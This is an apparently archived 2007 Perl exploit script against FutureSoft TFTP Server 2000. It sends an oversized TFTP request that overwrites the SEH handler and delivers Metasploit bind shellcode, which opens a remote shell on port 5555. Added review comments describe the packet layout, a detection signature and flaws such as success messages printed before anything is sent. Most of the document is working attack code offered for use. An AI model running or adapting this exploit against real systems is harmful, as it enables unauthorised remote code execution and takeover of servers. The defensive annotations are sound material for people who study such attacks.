
# Title : FutureSoft TFTP Server 2000 Remote SEH Overwrite Exploit
# Published : 2007-03-22
# Author : Umesh Wanve


#!/usr/bin/perl
# ===============================================================================================
#                  FutureSoft TFTP Server 2000 Remote SEH Overwrite Exploit
#                               By Umesh Wanve
# ===============================================================================================
# 
# Date : 22-03-2007
#
# Tested on Windows 2000 SP4 Server English
#           Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
# 
# Stack --->      buffer                       ===  AAAAA.........
#                   |
#            Pointer to next SEH               ===  Short Jump to Hellcode  
#                   |
#               SEH Handler                    ===  Pop, Pop, Ret (ws2help.dll win2000 sp4)
#                   |
#                NOP Sled                      ===  Nop Sled
#                   | 
#                Hellcode                      ===  Hell.........
# 
# This exploit will open port 5555 on remote server. Connect it to open shell.
#
#
# P.S: This was written for educational purposes. Use it at your own risk. The author will not be
#      responsible for any damage.
#  
# Always Thanks to Metasploit. 
#
#==================================================================================================


use IO::Socket;
#use strict;

 
# NOTE(review): 2007 proof-of-concept against FutureSoft TFTP Server 2000; the packet
# layout is the one drawn in the header comment above.  Strictures are commented out
# ("#use strict;" above), so $socket further down is an undeclared package global, and
# nothing checks that a target host was actually supplied in $ARGV[0].
my($read_request)="x00x01";                                                # GET or PUT request

my($tailer)="x00x6ex65x74x61x73x63x69x69x00";                      #transporting mode (eg. netascii)   

                        
# win32_bind -  EXITFUNC=seh LPORT=5555 Size=344 Encoder=Pex http://metasploit.com
# Opaque encoded payload as emitted by the generator named on the line above; it is not
# reviewed byte by byte here, and the header already states that it is meant to be swapped.
my($shellcode)=
"x90x90x90x90".                                          #padding
"x33xc9x83xe9xb0xe8xffxffxffxffxc0x5ex81x76x0ex60".
"x5fx45x77x83xeexfcxe2xf4x9cx35xaex3ax88xa6xbax88".
"x9fx3fxcex1bx44x7bxcex32x5cxd4x39x72x18x5exaaxfc".
"x2fx47xcex28x40x5exaex3exebx6bxcex76x8ex6ex85xee".
"xccxdbx85x03x67x9ex8fx7ax61x9dxaex83x5bx0bx61x5f".
"x15xbaxcex28x44x5exaex11xebx53x0exfcx3fx43x44x9c".
"x63x73xcexfex0cx7bx59x16xa3x6ex9ex13xebx1cx75xfc".
"x20x53xcex07x7cxf2xcex37x68x01x2dxf9x2ex51xa9x27".
"x9fx89x23x24x06x37x76x45x08x28x36x45x3fx0bxbaxa7".
"x08x94xa8x8bx5bx0fxbaxa1x3fxd6xa0x11xe1xb2x4dx75".
"x35x35x47x88xb0x37x9cx7ex95xf2x12x88xb6x0cx16x24".
"x33x0cx06x24x23x0cxbaxa7x06x37x50xc4x06x0cxccx96".
"xf5x37xe1x6dx10x98x12x88xb6x35x55x26x35xa0x95x1f".
"xc4xf2x6bx9ex37xa0x93x24x35xa0x95x1fx85x16xc3x3e".
"x37xa0x93x27x34x0bx10x88xb0xccx2dx90x19x99x3cx20".
"x9fx89x10x88xb0x39x2fx13x06x37x26x1axe9xbax2fx27".
"x39x76x89xfex87x35x01xfex82x6ex85x84xcaxa1x07x5a".
"x9ex1dx69xe4xedx25x7dxdcxcbxf4x2dx05x9execx53x88".
"x15x1bxbaxa1x3bx08x17x26x31x0ex2fx76x31x0ex10x26".
"x9fx8fx2dxdaxb9x5ax8bx24x9fx89x2fx88x9fx68xbaxa7".
"xebx08xb9xf4xa4x3bxbaxa1x32xa0x95x1fx90xd5x41x28".
"x33xa0x93x88xb0x5fx45x77".
"x90x90x90x90".                                        #padding
"x90x90x90x90";

my($pointer_to_next_seh)="xebx06x90x90";               #short jump to shellcode

my($seh_handler)="xa9x11x02x75";                        #pop, pop, ret 
                                                            #(ws2help.dll win2000 sp4) 
                                                            # Address is specific to that one
                                                            # DLL build, per the note above.

#Building malicious buffer
# Layout: request opcode, a 268-byte filename field, the SEH overwrite pair, the payload,
# then the mode string.  Defensive note: a legitimate RRQ/WRQ carries a short filename, so
# a TFTP request whose filename field runs to hundreds of bytes is the observable signature
# here -- a server-side bound on filename length, or an IDS rule on oversized requests to
# UDP/69, is what would catch it.

my($buffer)=$read_request.("A" x 268).$pointer_to_next_seh.$seh_handler.$shellcode.$tailer;  


# For a UDP socket, IO::Socket::INET->new only records the peer as the default destination;
# no datagram is exchanged at this point, so new() succeeding says nothing about whether a
# TFTP server is actually listening on the target.
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "69",

Proto    => "UDP"))
{
                
                 # All five status lines are printed before anything is sent, and no reply
                 # is ever read, so they report intent rather than outcome.
                 print "++Building Packet......n"  ;
		     print "++Connecting to server.....n";
		     print "++Sending Buffer ....n";
	           print "++Exploit Successfull...n";
                 print "++Connect to victim on 5555.....n";
	
                 # request + file name  + mode
                 #see tftp protocol

                 # Single datagram; the return value of print is not checked.
                 print $socket $buffer;      
                 sleep(1);
			
                 close($socket);
}
else
{
                 # Reached only when the local socket could not be set up (typically an
                 # unresolvable host name), not when the remote server is down.
                 print "Cannot connect to $ARGV[0]:69n";
}